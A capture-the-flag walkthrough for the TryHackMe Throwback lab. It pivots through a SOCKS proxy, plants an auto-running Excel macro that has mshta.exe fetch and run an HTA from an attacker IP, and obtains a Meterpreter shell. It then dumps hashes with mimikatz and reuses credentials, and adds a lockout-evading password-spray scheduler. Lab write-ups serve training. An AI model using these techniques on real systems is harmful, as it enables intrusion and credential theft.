TryHackMe-THROWBACK-TIME(100.20.34.176)
Since we already have a SOCKS4 proxy listening on port 1080 from the pivot, we run nmap through proxychains to see whether we can reach any port on the TIME machine. Only a TCP connect scan (-sT) works through a SOCKS proxy; SYN probes and ICMP host discovery cannot be tunnelled, so add -Pn as well, otherwise nmap reports the host as down.
The web port is reachable, so we can access the web page.
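To show why a SOCKS4 pivot only supports TCP connect scans, here is the SOCKS4 CONNECT exchange that proxychains performs for every nmap probe, written as an added example rather than anything from the original writeup. The proxy address 127.0.0.1:1080 and the probed ports are assumptions for the demo; the target IP is the TIME machine named on the page.

```python
import socket
import struct

# Assumed for this example: the pivot's SOCKS4 listener is on our own box at
# port 1080 (the page only states the port), and 100.20.34.176 is TIME.
PROXY = ("127.0.0.1", 1080)
TARGET_IP = "100.20.34.176"

SOCKS4_VERSION = 0x04
CMD_CONNECT = 0x01          # SOCKS4 only defines CONNECT and BIND; no raw sockets, no ICMP
REPLY_GRANTED = 0x5A
REPLY_REJECTED = 0x5B


def build_connect_request(ip: str, port: int, user_id: bytes = b"") -> bytes:
    """Build a SOCKS4 CONNECT request: VN, CD, DSTPORT, DSTIP, USERID, NUL."""
    return struct.pack("!BBH4s", SOCKS4_VERSION, CMD_CONNECT, port,
                       socket.inet_aton(ip)) + user_id + b"\x00"


def parse_reply(data: bytes) -> bool:
    """Return True if the proxy granted the CONNECT.

    The reply is 8 bytes: VN (always 0), CD, DSTPORT, DSTIP. CD 0x5A means the
    proxy completed the TCP handshake with the target (port open); 0x5B means
    it could not (closed or filtered; SOCKS4 cannot tell the two apart).
    """
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd = data[0], data[1]
    if vn != 0x00:
        raise ValueError(f"unexpected SOCKS4 reply version {vn:#x}")
    return cd == REPLY_GRANTED


def check_port(ip: str, port: int, proxy=PROXY, timeout: float = 5.0) -> bool:
    """Ask the SOCKS4 proxy to open ip:port for us and report whether it could.

    This is a full TCP connection made by the proxy, which is exactly what
    nmap -sT does through proxychains; a SYN scan would need raw sockets on
    the pivot and never reaches the proxy at all.
    """
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_connect_request(ip, port))
        reply = s.recv(8)
    return parse_reply(reply)


if __name__ == "__main__":
    # Assumed ports for the demo; the page does not list which ones were scanned.
    for port in (80, 443, 3389):
        try:
            state = "open" if check_port(TARGET_IP, port) else "closed/filtered"
        except OSError as exc:
            state = f"proxy error: {exc}"
        print(f"{TARGET_IP}:{port} -> {state}")
```

Because every probe is a complete connect through the pivot, scans are slow and noisy on the pivot host; scan a short, targeted port list rather than the default 1000.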
Going back to the MAIL machine, we log in as MurphyF (username murphyf, with the password we already have) to get the password reset link.
Now we need to update our /etc/hosts file so that the hostname in the reset link resolves to the TIME machine.
We set a new password through the reset link and can now log in to the web application with it.
Create a Microsoft Excel macro-enabled document containing the following macro. The .hta it fetches is served by Metasploit's HTA server module (exploit/windows/misc/hta_server), which prints the URL to use when it starts:
Sub HelloWorld()
    ' mshta.exe fetches the HTA from the Metasploit listener and executes it
    PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub

Sub Auto_Open()
    ' Excel runs Auto_Open as soon as the workbook is opened, so no user click is needed
    HelloWorld
End Sub
Upload that document through the web application.
When it is opened on the server and the macro runs, you get a Meterpreter shell back.
Typing sysinfo
shows that we are on 64-bit Windows but in a 32-bit Meterpreter session (mshta.exe was launched from 32-bit Office), so we need to migrate into a 64-bit process. Run ps
to list the currently running processes.
Here we need to identify a process that is running as NT AUTHORITY\SYSTEM
and is also x64. Avoid critical system processes such as lsass.exe or csrss.exe: if the injection fails, the box blue-screens and the foothold is lost.
We find a process satisfying both requirements and migrate into it. Note that migrating into a SYSTEM-owned process only succeeds because our current token already has the privilege to open it (SYSTEM itself, or an administrator holding SeDebugPrivilege); from a plain user session the migration is denied.
After the migration we are the highest-privileged user and our Meterpreter session is running in a 64-bit process.
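Picking the migration target by eye from a long ps listing is error-prone, so here is the selection logic as code: parse Meterpreter's ps output and keep only x64, SYSTEM-owned, non-critical processes. This is an added example, not part of the original writeup; the process list below is constructed to look like Meterpreter's output (same column order), and the PIDs, paths and the THROWBACK\Administrator account are made up for the demo.

```python
import re

# Constructed sample of Meterpreter `ps` output, not captured from the room.
# Column order (PID PPID Name Arch Session User Path) matches what Meterpreter
# prints; values are invented for the example.
PS_OUTPUT = r"""
Process List
============

 PID   PPID  Name              Arch  Session  User                     Path
 ---   ----  ----              ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System            x64   0
 452   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM      \SystemRoot\System32\smss.exe
 640   540   lsass.exe         x64   0        NT AUTHORITY\SYSTEM      C:\Windows\System32\lsass.exe
 1016  580   svchost.exe       x64   0        NT AUTHORITY\SYSTEM      C:\Windows\System32\svchost.exe
 1304  580   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM      C:\Windows\System32\spoolsv.exe
 2256  2200  EXCEL.EXE         x86   0        THROWBACK\Administrator  C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
 2300  2256  mshta.exe         x86   0        THROWBACK\Administrator  C:\Windows\SysWOW64\mshta.exe
 2984  2924  explorer.exe      x64   1        THROWBACK\timekeeper     C:\Windows\explorer.exe
"""

# One table row: PID PPID Name Arch Session, then an optional tail holding
# User and Path. Rows without an Arch column (e.g. [System Process]) are skipped.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(x64|x86)\s+(\d+)(?:\s+(.*?))?\s*$")

# Processes Windows cannot survive losing; a failed injection into one of
# these means a blue screen, so they are never migration targets.
CRITICAL = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
            "lsass.exe", "services.exe"}


def parse_ps(text):
    """Turn Meterpreter `ps` text into a list of dicts, one per process."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        pid, ppid, name, arch, session, tail = m.groups()
        user, path = "", ""
        if tail:
            # User may contain a single space (NT AUTHORITY\SYSTEM); the Path
            # column is separated from it by two or more spaces.
            parts = re.split(r"\s{2,}", tail, maxsplit=1)
            user = parts[0]
            path = parts[1] if len(parts) > 1 else ""
        procs.append({"pid": int(pid), "ppid": int(ppid), "name": name,
                      "arch": arch, "session": int(session),
                      "user": user, "path": path})
    return procs


def migration_candidates(procs, current_pid):
    """x64 processes owned by NT AUTHORITY\\SYSTEM that are safe to migrate into."""
    return [p for p in procs
            if p["arch"] == "x64"
            and p["user"].upper() == r"NT AUTHORITY\SYSTEM"
            and p["name"].lower() not in CRITICAL
            and p["pid"] != current_pid]


if __name__ == "__main__":
    # In the sample our 32-bit session lives in mshta.exe (PID 2300).
    for p in migration_candidates(parse_ps(PS_OUTPUT), current_pid=2300):
        print(f"migrate {p['pid']}  # {p['name']} ({p['arch']}, {p['user']})")
```

Long-lived service hosts such as spoolsv.exe or a svchost.exe instance are the usual choice: they run as SYSTEM in session 0, are 64-bit on a 64-bit host, and nobody notices if they hiccup.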
We can now run mimikatz (via the kiwi extension) and hashdump; both need a 64-bit SYSTEM session on a 64-bit host, which is why the migration came first.
We have successfully dumped the hashes of the accounts on this machine.
Using proxychains we SSH into the TIME machine with Timekeeper's credentials.
Switch to the directory where mysql.exe is and connect using the password of the Kerberoasted MySQL service account.
Save the list of usernames found in the domain_users database.
We can reuse the same password list we used to get access to Throwback's mail and spray it against these accounts, one password at a time across all users so that no single account trips the lockout threshold.
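The spray itself is where people lock out a domain, so here is the scheduling logic written out: normalise the saved username list, try one password against every user per round, and space the rounds so no account collects enough failures inside the lockout observation window. This is an added example, not code from the writeup; the username dump, the password list, the lockout threshold of 5 and the 30-minute window are all assumptions, and the real login check (SMB, OWA, LDAP bind) is passed in as a callable because the page does not say which service was sprayed.

```python
import time
from datetime import timedelta
from typing import Callable

# Constructed sample inputs, not data from the page: a username dump as it
# might have been saved from the domain_users table (with the duplicates and
# mixed case such dumps usually have) and a reused password list.
DOMAIN_USERS_DUMP = """\
Timekeeper
murphyf
timekeeper
Administrator

"""
PASSWORD_LIST = ["Winter2020", "Password1!", "Throwback1"]


def load_usernames(text: str) -> list:
    """Strip, lowercase (AD logons are case-insensitive), drop blanks and
    duplicates, keep the original order."""
    seen, users = set(), []
    for line in text.splitlines():
        name = line.strip().lower()
        if name and name not in seen:
            seen.add(name)
            users.append(name)
    return users


def spray_schedule(users, passwords, lockout_threshold: int, window: timedelta):
    """One password per round across every user; rounds are spaced so each
    account sees at most (lockout_threshold - 1) failures per window."""
    if lockout_threshold < 2:
        raise ValueError("lockout threshold must be at least 2 to spray at all")
    spacing = window / (lockout_threshold - 1)
    return [{"offset": i * spacing, "password": pw, "users": list(users)}
            for i, pw in enumerate(passwords)]


def run_spray(schedule, try_login: Callable[[str, str], bool],
              sleep=time.sleep, clock=time.monotonic):
    """Execute a schedule against a login check; stop touching an account
    once a password has hit for it. Waits are measured against a clock so
    the time spent on the attempts themselves does not shorten the gaps."""
    found = {}
    start = clock()
    for rnd in schedule:
        wait = start + rnd["offset"].total_seconds() - clock()
        if wait > 0:
            sleep(wait)
        for user in rnd["users"]:
            if user in found:
                continue
            if try_login(user, rnd["password"]):
                found[user] = rnd["password"]
    return found


if __name__ == "__main__":
    # Assumed policy for the demo: lockout after 5 failures within 30 minutes.
    users = load_usernames(DOMAIN_USERS_DUMP)
    for rnd in spray_schedule(users, PASSWORD_LIST, lockout_threshold=5,
                              window=timedelta(minutes=30)):
        print(f"t+{rnd['offset']}: try {rnd['password']!r} against {len(rnd['users'])} users")
```

Check the domain's actual policy first (net accounts /domain, or the lockout attributes in the Default Domain Policy) and plug those numbers in; a threshold of 0 means no lockout, but the scheduling is still worth keeping for noise reasons.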